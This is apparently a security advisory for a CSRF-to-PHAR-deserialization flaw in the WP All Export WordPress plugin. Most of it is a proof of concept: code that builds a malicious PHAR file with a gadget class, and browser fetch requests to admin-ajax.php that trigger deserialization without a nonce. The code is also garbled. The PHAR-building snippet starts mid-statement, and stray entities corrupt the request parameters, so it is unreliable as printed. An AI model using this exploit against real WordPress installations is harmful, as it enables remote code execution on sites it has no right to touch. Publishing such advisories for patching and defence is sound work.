WP All Export (Free < 1.4.1, Pro < 1.8.6) - Author+ PHAR Deserialization via CSRF

Description The plugin does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution.

PoC

1. Ensure your WordPress installation is using PHP version 7.4 or earlier. 2. Create a poc.phar file using the following code, and add it to the root directory of the server: startBuffering(); $phar->addFromString( ‘test.txt’, ‘text’ ); $phar->setStub( ‘’ ); $phar->setMetadata( new Evil() ); $phar->stopBuffering(); echo “$pharFile successfully created” . PHP_EOL; } catch (Exception $e) { echo $e->getMessage(); } 3. Add the following code to the server to simulate a gadget: class Evil { function __wakeup() { die(‘Arbitrary deserialization’); } } 4. Run the following code in your browser to create a new export as a Super Admin user and note its ID. Notice that no nonce is required. Replace the /var/www/html directory if needed. await fetch(“/wp-admin/admin-ajax.php?action=options&page;=pmxe-admin-export”, { “credentials”: “include”, “headers”: { “Content-Type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “update_previous=0&filepath;=phar:///var/www/html/poc.phar/test.txt&export;_to=XmlGoogleMerchants”, “mode”: “cors”, }); 5. Run the following code in your browser, as a Super Admin (again no nonce needed), using the ID of the export created in the previous step, and see that the PHAR deserialization occurs by examining its output. await fetch(“https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php?action=download&amp;page;=pmxe-admin-export&amp;google;_feed=1&amp;id;=ID”, { “credentials”: “include”, “headers”: {}, “method”: “GET”, “mode”: “cors”, });